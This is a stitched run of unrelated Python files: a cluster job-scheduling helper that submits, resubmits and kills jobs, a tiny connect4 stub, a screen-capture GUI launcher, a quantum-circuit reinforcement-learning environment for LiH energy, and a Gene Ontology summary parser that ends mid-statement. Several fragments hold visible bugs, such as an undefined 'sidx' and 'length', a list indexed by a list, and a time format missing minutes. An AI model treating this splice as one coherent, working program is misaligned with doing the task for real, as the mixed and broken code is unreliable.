status_list = ['t', 'Eqw', 'dt', 'dr']
if status in status_list:
return 0
else:
return 1
def rproc_submit_and_wait(jobinfo, finish_frac, jobtimeout):
# [jobinfo,frac_finished]=rproc_submit_and_wait(jobinfo, finish_frac, jobtimeout)
num_jobs = 0
for i in range(len(jobinfo)):
if jobinfo[i].created == 1:
num_jobs += 1
num_finished = 0
while (num_finished / float(num_jobs) < finish_frac):
num_finished = 0
for id in range(len(jobinfo)):
if rproc_finished(jobinfo[id]):
num_finished += 1
else:
if jobinfo[id].created == 1:
if rproc_time_since_submission(jobinfo[id]) > jobtimeout:
print('WARNING: job took longer than timeout. Killing and restarting it', file=sys.stderr)
rproc_kill(jobinfo[id])
jobinfo[id] = rproc_resubmit(jobinfo[id], 1)
print('waiting for jobs to finish: %i/%i \r' % (num_finished, num_jobs))
if (num_finished / float(num_jobs) < finish_frac):
time.sleep(10)
print('')
def rproc_submit_batch(jobinfo, blocksize):
# [jobinfo, meta_jobinfo] = rproc_submit_many(jobinfo, blocksize)
meta_jobinfo = rproc_empty(0)
time_per_submission = 1.0/60 # 1 seconds
time_per_metajob = [0 for i in range(int(math.ceil(len(jobinfo) / float(blocksize))))]
metablockassignment = [0 for i in range(len(jobinfo))]
s_idx = sorted(list(range(len(jobinfo))), key=(lambda x: -jobinfo[x].time))
for i in sidx:
step = (time_per_submission * length(time_per_metajob)) / (len(time_per_metajob) - 1)
span = [-time_per_submission * len(time_per_metajob) + (ii * step) for ii in range(len(time_per_metajob))]
span = [span[x] + time_per_metajob[x] for x in range(len(span))]
idx = span.index(min(span))
metablockassignment[i] = idx
time_per_metajob[idx] += jobinfo[i].time
meta_i = 1
for i in range(int(math.ceil(len(jobinfo) / float(blocksize)))):
idx = [ii for ii in range(len(metablockassignment)) if metablockassignment[ii] == i]
if len(idx) == 0:
continue
for j in range(len(idx)):
options = jobinfo[idx[j]].options
options.submit_now = 0
jobinfo[idx[j]] = rproc(jobinfo[idx[j]].ProcName, jobinfo[idx[j]].P1, jobinfo[idx[j]].Mem, options, jobinfo[idx[j]].time, jobinfo[idx[j]].callfile, resubmission=True)
jobinfo_ = jobinfo[idx]
options = jobinfo[idx[0]].options
options.submit_now = 1
options.verbosity = 1
memory_MB = max([x.Mem for x in jobinfo_])
minutes = sum([int(x.time) for x in jobinfo_])
print('submitting job %i/%i (%i subjobs) \r' % (i, int(math.ceil(len(jobinfo) / float(blocksize))), len(idx)))
meta_jobinfo[meta_i] = rproc('rproc_submit_batch_helper', jobinfo_, memory_MB, options, minutes)
for j in range(len(idx)):
jobinfo[idx[j]].log_fname = meta_jobinfo[meta_i].log_fname
jobinfo[idx[j]].jobid = meta_jobinfo[meta_i].jobid
jobinfo[idx[j]].submission_time = meta_jobinfo[meta_i].submission_time
meta_i += 1
print('')
return (jobinfo, meta_jobinfo)
def rproc_submit_batch_helper(parameters):
# x = rproc_submit_batch_helper(parameters)
print('Executing a batch of %i jobs in a super-job' % len(parameters))
pp = os.getcwd()
for i in range(len(parameters)):
os.chdir(pp)
print('starting job %i in file %s' %(i, parameters[i].mat_fname))
print('=========================================')
try:
start_proc(parameters[i].mat_fname, parameters[i].data_fname, 0)
except:
print('execution of start_proc failed', file=sys.stderr)
# remove files
for i in range(len(parameters)):
fname = parameters[i].mat_fname
os.remove(fname) # mat file
os.remove('%spy' % fname.strip('pickle')) # m file
fname = parameters[i].data_fname
os.remove(fname) # data file
return 0
def rproc_time_since_submission(jobinfo):
# time = rproc_time_since_submission(jobinfo)
# returns time in minutes since submission
return (time.time() - jobinfo.submission_time)/60
def rproc_wait(jobinfo, pausetime=120, frac_finished=1.0, resub_on=1, verbosity=2):
# [jobinfo, num_crashed] = rproc_wait(jobinfo, pausetime, frac_finished, resub_on, verbosity)
global rproc_wait_jobinfo
rproc_wait_jobinfo = jobinfo
if resub_on == 1:
print('\n\ncrashed jobs will be resubmitted by rproc_wait')
elif resub_on == -1:
print('\n\ncrashed jobs may be resubmitted by rproc_wait')
else:
print('\n\ncrashed jobs will not be resubmitted by rproc_wait')
if not isinstance(jobinfo, list):
jobinfo = [jobinfo]
num_jobs = 0
num_crashed = 0
for i in range(len(jobinfo)):
if jobinfo[i].created == 1:
if jobinfo[i].time is None:
print('WARNING: job created but not submitted yet. ignoring', file=sys.stderr)
jobinfo[i].created = 0
else:
num_jobs += 1
num_finished = 0
first_iter = True
while (num_finished < num_jobs * frac_finished) or (num_crashed > 0):
if not first_iter:
time.sleep(pausetime)
first_iter = False
num_finished = 0
num_crashed = 0
crashed_files = 'log files of crashed jobs:'
for id in range(len(jobinfo)):
cur_finished = rproc_finished(jobinfo[id])
(still_running, qstat_line, start_time, status) = rproc_still_running(jobinfo[id])
if status == -1:
return (jobinfo, num_crashed)
jobinfo[id].start_time = start_time
if cur_finished:
num_finished += 1
elif not still_running:
num_finished += 1
num_crashed += 1
crashed_files = '%s\n%s' % (crashed_files, jobinfo[id].log_fname)
if jobinfo[id].crashed_time is None:
jobinfo[id].crashed_time = time.time()
elif 24 * 60 * (time.time() - jobinfo[id].crashed_time) > max(3 * (pausetime/60.0), 0.1) and (resub_on == 1 or (resub_on == -1 and jobinfo[id].resubmit >= jobinfo[id].retries + 1)):
if resub_on == 1:
(reachedlimit, jobwalltime) = rproc_reached_timelimit(jobinfo[id])
if reachedlimit: # check whether the job has been killed because it reached the time limit
if verbosity >= 1:
print('job has been canceled because it used %1.0fs, but time limit was %1.0fs walltime.\nhence, we increase the time limit to %1.0fs.\n' % (jobwalltime, jobinfo[id].time * 60, max(jobinfo[id].time, jobwalltime) * 2))
jobinfo[id].time = max(jobinfo[id].time, jobwalltime / 60) * 2
elif resub_on == -1:
jobinfo[id].time = jobinfo[id].time_req_resubmit[min(jobinfo[id].retries + 1, len(jobinfo[id].time_req_resubmit) - 1)]
jobinfo[id].Mem = jobinfo[id].mem_req_resubmit[min(jobinfo[id].retries + 1, len(jobinfo[id].mem_req_resubmit) - 1)]
jobinfo[id].start_time = []
if verbosity >= 1:
print('resubmitting job (%i) with new time and memory limitations: %iMb and %i minutes (retry #%i)\n' % (jobinfo[id].jobid, jobinfo[id].Mem, jobinfo[id].time, jobinfo[id].retries + 1))
if verbosity >= 2:
print('log file of previous attempt %s\n' % jobinfo[id].log_fname)
jobinfo[id] = rproc_resubmit(jobinfo[id])
jobinfo[id].crashed_time = None
num_finished -= 1
else:
if verbosity >= 2:
print('%s' % qstat_line)
### hard_time_limit in minutes
if len(jobinfo[id].start_time) > 0 and 24 * 60 * (time.time() - jobinfo[id].start_time) > jobinfo[id].hard_time_limit:
print('delete job (%i) because hard time limit (%imin) was reached\n' % (jobinfo[id].jobid, jobinfo[id].hard_time_limit))
#SCHED_DELETE_JOB
subprocess.call(['qdel', str(jobinfo[id].jobid)])
if verbosity >= 1:
print('\n%i of %i jobs finished (%i of them crashed) \n' % (num_finished, num_jobs, num_crashed))
if verbosity >= 2:
if len(crashed_files.strip().split('\n')) > 0:
print('%s\n' % crashed_files)
if resub_on == 0 and num_finished == num_jobs * frac_finished:
break
if resub_on == -1 and num_finished == num_jobs * frac_finished:
all_tried = True
for i in range(len(jobinfo)):
fin = rproc_finished(jobinfo[i])
if (jobinfo[i].resubmit >= jobinfo[i].retries + 1) and not fin:
all_tried = False
if all_tried:
break
time.sleep(1)
def start_proc(fname, data_fname, rm_flag=True):
# start_proc(fname, data_fname, rm_flag)
global THIS_IS_A_RPROC_PROCESS
THIS_IS_A_RPROC_PROCESS = True
### load and create environment
(ProcName, dirctry, options, callfile) = pickle.load(open(fname, 'rb'))
os.chdir(dirctry)
print('%s on %s started (in %s; from %s %s)' % (ProcName, os.environ['HOSTNAME'], dirctry, fname, data_fname))
print('### job started %s' % time.strftime('%Y-%m-%d %H:%S'))
if 'rmpaths' in options:
for i in range(len(options['rmpaths'])):
print('removing path %s' % options['rmpaths'][i])
while options['rmpaths'][i] in sys.path:
r_idx = sys.path.index(options['rmpaths'][i])
del sys.path[r_idx]
if 'addpaths' in options:
for i in range(len(options['addpaths'])):
if not options['addpaths'][i] in sys.path:
print('adding path %s' % options['addpaths'][i])
sys.path.append(options['addpaths'][i])
if 'rm_flag' in options:
rm_flag = options['rm_flag']
### create environment
import_list = []
for mod in options['imports']:
module = options['imports'][mod]
if module[1] == 'builtin':
if imp.is_builtin(module[0]) == 1:
exec('import %s' % module[0])
else:
mod_sl = module[0].split('.')
subpaths = get_subpaths(os.path.dirname(module[1]).split('/'))
imported = True
for m in range(len(mod_sl)):
#exec('exists = \'%s\' in globals()' % '.'.join(mod_sl[:m+1]))
exists = '.'.join(mod_sl[:m+1]) in globals()
if not exists and not '.'.join(mod_sl[:m+1]) in import_list and not 'rproc' in mod_sl[:m+1]:
try:
(f, fn, des) = imp.find_module(mod_sl[m], subpaths)
try:
### TODO: This is a bit hacky, but the only way that linalg can be loaded right now
if fn.endswith('scipy'):
import scipy
import_list.append('scipy')
continue
exec('%s = imp.load_module(\'%s\', f, fn, des)' % ('.'.join(mod_sl[:m+1]), '.'.join(mod_sl[:m+1])))
import_list.append('.'.join(mod_sl[:m+1]))
except:
imported = False
finally:
if f is not None:
f.close()
except ImportError:
print('Module %s could not be found' % '.'.join(mod_sl[:m+1]), file=sys.stderr)
imported = False
else:
imported = False
if mod != module[0] and imported:
exec('%s = %s' % (mod, module[0]))
#sys.path = [dirctry] + sys.path
### load data into environment
P1 = pickle.load(open(data_fname, 'rb'))
retval1 = []
retval2 = []
try:
if callfile[0] == '__main__':
sys.path.append(os.getcwd())
exec('from %s import %s' % (re.sub(r'.py$', '', callfile[1]), ProcName))
else:
exec('from %s import %s' % (callfile[0], ProcName))
if not P1 is None:
retval = eval('%s(P1)' % ProcName)
else:
retval = eval('%s()' % ProcName)
if retval is None:
pass
elif isinstance(retval, tuple):
retval1 = retval[0]
retval2 = retval[1]
else:
retval1 = retval
if not ('no_result_file' in options and options['no_result_file']):
print('saving results to %s_result.pickle' % os.path.splitext(fname)[0])
pickle.dump((retval1, retval2), open('%s_result.pickle' % os.path.splitext(fname)[0], 'wb'), -1)
except (NameError, TypeError) as e:
print('execution of %s failed' % ProcName, file=sys.stderr)
print('%s' % str(e), file=sys.stderr)
global MATLAB_RETURN_VALUE
MATLAB_RETURN_VALUE = -1
rm_flag = False
except RprocRerun as e:
# if we rerun, then we should not cleanup
print('job is marked for rerunning. exiting without finished computations', file=sys.stderr)
else:
if rm_flag:
os.remove(fname) # data file
os.remove('%ssh' % fname.strip('pickle')) # script file
print('### job finished %s' % time.strftime('%Y-%m-%d %H:%S'))
def split_walltime(time_str):
""" Transform wallclock time string into integer of seconds
Arguments:
time_str -- time stamp of the format hours:minutes:seconds
Return values:
seconds -- integer containing number of seconds expressed by time_str
"""
factors = [1, 60, 3600, 86400]
seconds = 0
sl = time_str.split(':')
for i, j in enumerate(range(len(sl) - 1, -1, -1)):
if i < len(factors):
seconds += (int(sl[i]) * factors[j])
else:
print('WARNING: walltime computation exceeds max value', file=sys.stderr)
return seconds
def get_subpaths(sl):
return ['/'.join(sl[:len(sl)-i]) for i in range(len(sl) - 1)]
def spladder_pyproc(options):
_set_scheduler()
start_proc(options.proc, options.data)
if __name__ == "__main__":
_set_scheduler()
start_proc(sys.argv[1], sys.argv[2])
|
name = "connect4"
|
#!/usr/bin/env python
# coding: utf-8
from ide import CropIDE
from minicap import Stream
from queue import Queue
import logutils
import logging
log = logutils.getLogger('tkgui')
log.setLevel(logging.DEBUG)
def main(serial=None, scale=0.5):
log.debug("gui starting(scale: {}) ...".format(scale))
# d = u2.connect_usb(serial)
# gui = CropIDE('GUI SN: %s' % serial, ratio=scale, device=d)
# gui.mainloop()
q = Queue()
a = Stream.getBuilder(ip='127.0.0.1', port=1313, queue=q)
a.run()
gui = CropIDE(title='SmartRecord', picture=q)
gui.mainloop()
if __name__ == '__main__':
main()
def test():
gui = CropIDE('AirtestX IDE')
image = Image.open('screen.png')
gui.draw_image(image)
# gui.refresh_screen()
# gui.draw_point(100, 100)
gui.mainloop()
if __name__ == '__main__':
# test()
main(None)
|
import torch
from qulacs import QuantumCircuit
from qulacs.gate import CNOT, RX, RY, RZ
from utils import *
from sys import stdout
from itertools import product
import scipy
import VQE as vc
import os
import numpy as np
import random
import copy
import curricula
try:
from qulacs import QuantumStateGpu as QuantumState
except ImportError:
from qulacs import QuantumState
class CircuitEnv():
def __init__(self, conf, device):
self.num_qubits = conf['env']['num_qubits']
self.num_layers = conf['env']['num_layers']
self.ham_mapping = conf['problem']['mapping']
self.geometry = conf['problem']['geometry'].replace(" ", "_")
self.fake_min_energy = conf['env']['fake_min_energy'] if "fake_min_energy" in conf['env'].keys() else None
self.fn_type = conf['env']['fn_type']
# If you want to run agent from scratch without *any* curriculum just use the setting with
# normal curriculum and set config[episodes] = [1000000]
self.curriculum_dict = {}
__ham = np.load(f"mol_data/LiH_{self.num_qubits}q_geom_{self.geometry}_{self.ham_mapping}.npz")
hamiltonian, eigvals, energy_shift = __ham['hamiltonian'], __ham['eigvals'], __ham['energy_shift']
min_eig = conf['env']['fake_min_energy'] if "fake_min_energy" in conf['env'].keys() else min(eigvals) + energy_shift
self.curriculum_dict[self.geometry[-3:]] = curricula.__dict__[conf['env']['curriculum_type']](conf['env'], target_energy=min_eig)
self.device = device
self.ket = QuantumState(self.num_qubits)
self.done_threshold = conf['env']['accept_err']
stdout.flush()
self.state_size = 5*self.num_layers
self.actual_layer = -1
self.prev_energy = None
self.energy = 0
self.action_size = (self.num_qubits*(self.num_qubits+2))
if 'non_local_opt' in conf.keys():
self.global_iters = conf['non_local_opt']['global_iters']
self.optim_method = conf['non_local_opt']["method"]
if conf['non_local_opt']["method"] in ["Rotosolve_local_end", "Rotosolve_local_end_only_rot", "scipy_local_end"]:
self.local_opt_size = conf['non_local_opt']["local_size"]
if "optim_alg" in conf['non_local_opt'].keys():
self.optim_alg = conf['non_local_opt']["optim_alg"]
else:
self.global_iters = 0
self.optim_method = None
def step(self, action, train_flag = True) :
"""
Action is performed on the first empty layer.
Variable 'actual_layer' points last non-empty layer.
"""
next_state = self.state.clone()
self.actual_layer += 1
"""
First two elements of the 'action' vector describes position of the CNOT gate.
Position of rotation gate and its axis are described by action[2] and action[3].
When action[0] == num_qubits, then there is no CNOT gate.
When action[2] == num_qubits, then there is no Rotation gate.
"""
next_state[0][self.actual_layer] = action[0]
next_state[1][self.actual_layer] = (action[0] + action[1]) % self.num_qubits
## state[2] corresponds to number of qubit for rotation gate
next_state[2][self.actual_layer] = action[2]
next_state[3][self.actual_layer] = action[3]
next_state[4][self.actual_layer] = torch.zeros(1)
self.state = next_state.clone()
# if rotation gate is present, then run the rotosolve
if next_state[2][self.actual_layer] != self.num_qubits:
thetas = self.get_angles(self.actual_layer)
next_state[-1] = thetas
if self.optim_method == "Rotosolve_local_end_only_rot":
thetas_to_optim = min(next_state[-1][next_state[2]!=self.num_qubits].size()[0],self.local_opt_size)
angle_indices = -np.arange(thetas_to_optim, 0, -1)
thetas = self.global_roto(angle_indices)
next_state[-1] = thetas
self.state = next_state.clone()
if self.optim_method == "Rotosolve_local_end":
thetas_to_optim = min(next_state[-1][next_state[2]!=self.num_qubits].size()[0],self.local_opt_size)
angle_indices = -np.arange(thetas_to_optim, 0, -1)
thetas = self.global_roto(angle_indices)
next_state[-1] = thetas
elif self.optim_method in ["scipy_local_end"]:
nb_of_thetas = next_state[-1][next_state[2]!=self.num_qubits].size()[0] ## number of all thetas
thetas_to_optim = min(nb_of_thetas, self.local_opt_size) ## number of thetas which we want to optimize
angle_indices = np.arange(nb_of_thetas - thetas_to_optim, nb_of_thetas) ## in COBYLA case we need them in ascending order and positive (not [-1,-2,-,3])
# print(angle_indices)
# print(next_state[-1][next_state[2]!=self.num_qubits])
if nb_of_thetas != 0:
thetas = self.scipy_optim(self.optim_alg, angle_indices)
next_state[-1] = thetas
elif self.optim_method == "Rotosolve_each_step":
thetas = self.global_roto()
next_state[-1] = thetas
elif self.optim_method in ["scipy_each_step"]:
if next_state[-1][next_state[2]!=self.num_qubits].size()[0] != 0:
thetas = self.scipy_optim(self.optim_alg)
next_state[-1] = thetas
self.state = next_state.clone()
energy = self.get_energy()
self.energy = energy
if energy < self.curriculum.lowest_energy and train_flag:
self.curriculum.lowest_energy = copy.copy(energy)
self.error = float(abs(self.min_eig-energy))
rwd = self.reward_fn(energy)
self.prev_energy = np.copy(energy)
energy_done = int(self.error < self.done_threshold)
layers_done = self.actual_layer == (self.num_layers-1)
done = int(energy_done or layers_done)
if done:
self.curriculum.update_threshold(energy_done=energy_done)
self.done_threshold = self.curriculum.get_current_threshold()
self.curriculum_dict[str(self.current_bond_distance)] = copy.deepcopy(self.curriculum)
return next_state.view(-1).to(self.device), torch.tensor(rwd, dtype=torch.float32, device=self.device), done
def reset(self):
"""
Returns randomly initialized state of environment.
State is a torch Tensor of size (5 x number of layers)
1st row [0, num of qubits-1] - denotes qubit with control gate in each layer
2nd row [0, num of qubits-1] - denotes qubit with not gate in each layer
3rd, 4th & 5th row - rotation qubit, rotation axis, angle
!!! When some position in 1st or 3rd row has value 'num_qubits',
then this means empty slot, gate does not exist (we do not
append it in circuit creator)
"""
## state_per_layer: (Control_qubit, NOT_qubit, R_qubit, R_axis, R_angle)
controls = self.num_qubits * torch.ones(self.num_layers)
nots = torch.zeros(self.num_layers)
rotats = self.num_qubits * torch.ones(self.num_layers)
generatos = torch.zeros(self.num_layers)
angles = torch.zeros(self.num_layers)
state = torch.stack((controls.float(),
nots.float(),
rotats.float(),
generatos.float(),
angles))
self.state = state
self.make_circuit(state)
self.actual_layer = -1
self.current_bond_distance = self.geometry[-3:]
self.curriculum = copy.deepcopy(self.curriculum_dict[str(self.current_bond_distance)])
self.done_threshold = copy.deepcopy(self.curriculum.get_current_threshold())
self.geometry = self.geometry[:-3] + str(self.current_bond_distance)
__ham = np.load(f"mol_data/LiH_{self.num_qubits}q_geom_{self.geometry}_{self.ham_mapping}.npz")
self.hamiltonian, eigvals, self.energy_shift = __ham['hamiltonian'], __ham['eigvals'], __ham['energy_shift']
self.min_eig = self.fake_min_energy if self.fake_min_energy is not None else min(eigvals) + self.energy_shift
self.max_eig = max(eigvals)+self.energy_shift
self.prev_energy = self.get_energy(state)
return state.view(-1).to(self.device)
def make_circuit(self, thetas=None):
"""
based on the angle of first rotation gate we decide if any rotation at
a given qubit is present i.e.
if thetas[0, i] == 0 then there is no rotation gate on the Control quibt
if thetas[1, i] == 0 then there is no rotation gate on the NOT quibt
CNOT gate have priority over rotations when both will be present in the given slot
"""
state = self.state.clone()
if thetas is None:
thetas = state[-1]
circuit = QuantumCircuit(self.num_qubits)
for i in range(self.num_layers):
if state[0][i].item() != self.num_qubits:
circuit.add_gate(CNOT(int(state[0][i].item()),
int(state[1][i].item())))
elif state[2][i].item() != self.num_qubits:
circuit.add_gate(self.R_gate(int(state[2][i].item()),
int(state[3][i].item()),
thetas[i].item()))
assert circuit.get_gate_count() <= self.num_layers, "Wrong circuit construction, too many gates!!!"
return circuit
def R_gate(self, qubit, axis, angle):
if axis == 'X' or axis == 'x' or axis == 1:
return RX(qubit, angle)
elif axis == 'Y' or axis == 'y' or axis == 2:
return RY(qubit, angle)
elif axis == 'Z' or axis == 'z' or axis == 3:
return RZ(qubit, angle)
else:
print("Wrong gate")
return 1
def get_energy(self, thetas=None):
circ = self.make_circuit(thetas)
self.ket.set_zero_state()
circ.update_quantum_state(self.ket)
v = self.ket.get_vector()
return np.real(np.vdot(v,np.dot(self.hamiltonian,v)))+ self.energy_shift
# return self.observable.get_expectation_value(self.ket) + self.energy_shift
def get_ket(self, thetas=None):
state = self.state.clone()
circ = self.make_circuit(thetas)
self.ket.set_zero_state()
circ.update_quantum_state(self.ket)
v = self.ket.get_vector()
v_real = torch.tensor(np.real(v),device=self.device,dtype=torch.float)
v_imag = torch.tensor(np.imag(v),device=self.device,dtype=torch.float)
return torch.cat((v_real,v_imag)).view(1,-1)
def get_angles(self, update_idx):
state = self.state.clone()
thetas = state[-1]
thetas[update_idx] = 0.0
theta1, theta2, theta3 = thetas.clone(), thetas.clone(), thetas.clone()
theta1[update_idx] -= np.pi/2
theta3[update_idx] += np.pi/2
e1 = self.get_energy(theta1)
e2 = self.get_energy(theta2)
e3 = self.get_energy(theta3)
## Energy lanscape is of the form A \sin( \theta + B) + C
C = 0.5*(e1+e3)
B = np.arctan2((e2-C), (e3-C))
thetas[update_idx] = -B-np.pi/2
return thetas
def global_roto(self, which_angles=[]):
state = self.state.clone()
thetas = state[-1][state[2]!=self.num_qubits]
qulacs_inst = vc.Parametric_Circuit(n_qubits=self.num_qubits)
param_circuit = qulacs_inst.construct_ansatz(state)
# print("DEPTH",param_circuit.calculate_depth())
arguments = (self.hamiltonian, param_circuit, self.num_qubits, self.energy_shift)
if not list(which_angles):
which_angles = np.arange(len(thetas))
for j in range(self.global_iters):
for i in which_angles:
theta1, theta2, theta3 = thetas.clone(), thetas.clone(), thetas.clone()
theta1[i] -= np.pi/2
theta3[i] += np.pi/2
e1 = vc.get_energy_qulacs(theta1,*arguments)
e2 = vc.get_energy_qulacs(theta2,*arguments)
e3 = vc.get_energy_qulacs(theta3,*arguments)
## Energy lanscape is of the form A \sin( \theta + B) + C
C = 0.5*(e1+e3)
B = np.arctan2((e2-C), (e3-C)) - theta2[i]
thetas[i] = -B-np.pi/2
state[-1][state[2]!=self.num_qubits] = thetas
return state[-1]
def scipy_optim(self, method, which_angles=[]):
state = self.state.clone()
thetas = state[-1][state[2]!=self.num_qubits]
qulacs_inst = vc.Parametric_Circuit(n_qubits=self.num_qubits)
qulacs_circuit = qulacs_inst.construct_ansatz(state)
x0 = np.asarray(thetas.cpu().detach())
if list(which_angles):
# print(which_angles)
# print(x0)
result_min_qulacs = scipy.optimize.minimize(vc.get_energy_qulacs, x0=x0[which_angles],
args=(self.hamiltonian,
qulacs_circuit,
self.num_qubits,
self.energy_shift,
which_angles),
method=method,
options={'maxiter':self.global_iters})
# print(result_min_qulacs)
x0[which_angles] = result_min_qulacs['x']
state[-1][state[2]!=self.num_qubits] = torch.tensor(x0, dtype=torch.float)
else:
result_min_qulacs = scipy.optimize.minimize(vc.get_energy_qulacs, x0=x0,
args=(self.hamiltonian,
qulacs_circuit,
self.num_qubits,
self.energy_shift),
method=method,
options={'maxiter':self.global_iters})
state[-1][state[2]!=self.num_qubits] = torch.tensor(result_min_qulacs['x'], dtype=torch.float)
return state[-1]
def reward_fn(self, energy):
if self.fn_type == "staircase":
return (0.2 * (self.error < 15 * self.done_threshold) +
0.4 * (self.error < 10 * self.done_threshold) +
0.6 * (self.error < 5 * self.done_threshold) +
1.0 * (self.error < self.done_threshold)) / 2.2
elif self.fn_type == "two_step":
return (0.001 * (self.error < 5 * self.done_threshold) +
1.0 * (self.error < self.done_threshold))/1.001
elif self.fn_type == "two_step_end":
max_depth = self.actual_layer == (self.num_layers - 1)
if ((self.error < self.done_threshold) or max_depth):
return (0.001 * (self.error < 5 * self.done_threshold) +
1.0 * (self.error < self.done_threshold))/1.001
else:
return 0.0
elif self.fn_type == "naive":
return 0. + 1.*(self.error < self.done_threshold)
elif self.fn_type == "incremental":
return (self.prev_energy - energy)/abs(self.prev_energy - self.min_eig)
elif self.fn_type == "incremental_clipped":
return np.clip((self.prev_energy - energy)/abs(self.prev_energy - self.min_eig),-1,1)
elif self.fn_type == "nive_fives":
max_depth = self.actual_layer == (self.num_layers-1)
if (self.error < self.done_threshold):
rwd = 5.
elif max_depth:
rwd = -5.
else:
rwd = 0.
return rwd
elif self.fn_type == "incremental_with_fixed_ends":
max_depth = self.actual_layer == (self.num_layers-1)
if (self.error < self.done_threshold):
rwd = 5.
elif max_depth:
rwd = -5.
else:
rwd = np.clip((self.prev_energy - energy)/abs(self.prev_energy - self.min_eig),-1,1)
return rwd
elif self.fn_type == "log":
return -np.log(1-(energy/self.min_eig))
elif self.fn_type == "log_neg_punish":
return -np.log(1-(energy/self.min_eig)) - 5
elif self.fn_type == "end_energy":
max_depth = self.actual_layer == (self.num_layers - 1)
if ((self.error < self.done_threshold) or max_depth):
rwd = (self.max_eig - energy) / (abs(self.min_eig) + abs(self.max_eig))
else:
rwd = 0.0
return rwd
if __name__ == "__main__":
pass |
#!/usr/bin/env python2
"""
INPUT - InterProScan result file:
ERR164409.102041_1_142_- eb53bcbf0748558f1f6c087ad5c76bcb 46 Gene3D G3DSA:3.90.1150.10 2 43 9.5E-6 T 18-02-2015 IPR015422 Pyridoxal phosphate-dependent transferase, major region, subdomain 2 GO:0003824|GO:0030170
ERR164409.101777_1_384_- 61af698732af6657579decd4ae9174b4 127 Pfam PF00483 Nucleotidyl transferase 1 122 9.5E-31 T 18-02-2015 IPR005835 Nucleotidyl transferase GO:0009058|GO:0016779 Reactome: REACT_17015
OUTPUT:
Full GO summary file output:
"GO:0055114","oxidation-reduction process","biological_process","8997"
"GO:0008152","metabolic process","biological_process","6400"
GO slim summary file output:
"GO:0030031","cell projection assembly","biological_process","0"
"GO:0071554","cell wall organization or biogenesis","biological_process","12"
"""
import argparse
import json
import os
import subprocess
import sys
import datetime
import time
import re
import collections
import io
import psutil as psutil
__author__ = 'Maxim Scheremetjew EMBL-EBI'
req_version = (2, 7)
cur_version = sys.version_info
if cur_version < req_version:
print "Your Python interpreter is too old. You need version 2.7.x" # needed for argparse
sys.exit()
class GOSummaryUtils(object):
@classmethod
def __pathExists(self, path, delay=30):
"""Utility method that checks if a file or directory exists, accounting for NFS delays
If there is a delay in appearing then the delay is logged
"""
startTime = datetime.datetime.today()
while not os.path.exists(path):
currentTime = datetime.datetime.today()
timeSoFar = currentTime - startTime
if timeSoFar.seconds > delay:
return False
time.sleep(1)
endTime = datetime.datetime.today()
totalTime = endTime - startTime
# if totalTime.seconds > 1:
# print "Pathop: Took", totalTime.seconds, "to determine that path ",path, "exists"
return True
@classmethod
def __fileOpen(self, fileName, fileMode, buffer=0):
"""File opening utility that accounts for NFS delays
Logs how long each file-opening attempt takes
fileMode should be 'r' or 'w'
"""
startTime = datetime.datetime.today()
# print "Fileop: Trying to open file", fileName,"in mode", fileMode, "at", startTime.isoformat()
if fileMode == 'w' or fileMode == 'wb':
fileHandle = open(fileName, fileMode)
fileHandle.close()
while not os.path.exists(fileName):
currentTime = datetime.datetime.today()
timeSoFar = currentTime - startTime
if timeSoFar.seconds > 30:
print "Fileop: Took more than 30s to try and open", fileName
print "Exiting"
sys.exit(1)
time.sleep(1)
try:
fileHandle = open(fileName, fileMode, buffer)
except IOError as e:
print "I/O error writing file{0}({1}): {2}".format(fileName, e.errno, e.strerror)
print "Exiting"
sys.exit(1)
endTime = datetime.datetime.today()
totalTime = endTime - startTime
# print "Fileop: Opened file", fileName, "in mode", fileMode, "in", totalTime.seconds, "seconds"
return fileHandle
@classmethod
def __goSortKey(self, item):
return (item[2], - item[3])
@staticmethod
def getFullGOSummary(core_gene_ontology, go2protein_count_dict, topLevelGoIds):
summary = []
for goId, term, category in core_gene_ontology:
if (goId in go2protein_count_dict) and (
goId not in topLevelGoIds): # make sure that top level terms are not included (they tell you nothing!)
count = go2protein_count_dict.get(goId)
summary.append((goId, term, category, count))
summary.sort(key=GOSummaryUtils.__goSortKey)
return summary
@staticmethod
def get_go_slim_summary(go_slim_banding_file, go_slims_2_protein_count):
summary = []
file_handler = GOSummaryUtils.__fileOpen(go_slim_banding_file, "r")
for line in file_handler:
if line.startswith("GO"):
line = line.strip()
line_chunks = line.split("\t")
go_id = line_chunks[0]
term = line_chunks[1]
category = line_chunks[2]
# Default value for the count
count = 0
if go_id in go_slims_2_protein_count:
count = go_slims_2_protein_count.get(go_id)
summary.append((go_id, term, category, count))
return summary
@staticmethod
def get_gene_ontology(obo_file):
"""
Parses OBO formatted file.
:param obo_file:
:return:
"""
result = []
handle = GOSummaryUtils.__fileOpen(obo_file, "r")
id, term, category = "", "", ""
for line in handle:
line = line.strip()
splitLine = line.split(": ")
if line.startswith("id:"):
id = splitLine[1].strip()
elif line.startswith("name:"):
term = splitLine[1].strip()
elif line.startswith("namespace"):
category = splitLine[1].strip()
else:
if id.startswith("GO:") and id and term and category:
item = (id, term, category)
result.append(item)
id, term, category = "", "", ""
handle.close()
return result
@staticmethod
def parseIprScanOutput(iprscanOutput):
# namedtuple type definition
ParsingStats = collections.namedtuple('ParsingStats',
'num_of_lines num_of_proteins proteins_with_go num_of_unique_go_ids')
go2protein_count = {}
num_of_proteins_with_go = 0
total_num_of_proteins = 0
if GOSummaryUtils.__pathExists(iprscanOutput):
handle = GOSummaryUtils.__fileOpen(iprscanOutput, "r")
goPattern = re.compile("GO:\d+")
line_counter = 0
previous_protein_acc = None
go_annotations_single_protein = set()
for line in handle:
line_counter += 1
line = line.strip()
chunks = line.split("\t")
# Get protein accession
current_protein_acc = chunks[0]
num_of_proteins = len(current_protein_acc.split("|"))
# If new protein accession extracted, store GO annotation counts in result dictionary
if not current_protein_acc == previous_protein_acc:
total_num_of_proteins += 1
if len(go_annotations_single_protein) > 0:
num_of_proteins_with_go += 1
previous_protein_acc = current_protein_acc
GOSummaryUtils.count_and_assign_go_annotations(go2protein_count, go_annotations_single_protein,
num_of_proteins)
# reset go id set because we hit a new protein accession
go_annotations_single_protein = set()
# Parse out GO annotations
# GO annotations are associated to InterPro entries (InterPro entries start with 'IPR')
# Than use the regex to extract the GO Ids (e.g. GO:0009842)
if len(chunks) >= 13 and chunks[11].startswith("IPR"):
for go_annotation in goPattern.findall(line):
go_annotations_single_protein.add(go_annotation)
# Do final counting for the last protein
GOSummaryUtils.count_and_assign_go_annotations(go2protein_count, go_annotations_single_protein,
num_of_proteins)
total_num_of_proteins += 1
handle.close()
processing_stats = ParsingStats(num_of_lines=line_counter,
num_of_proteins=total_num_of_proteins,
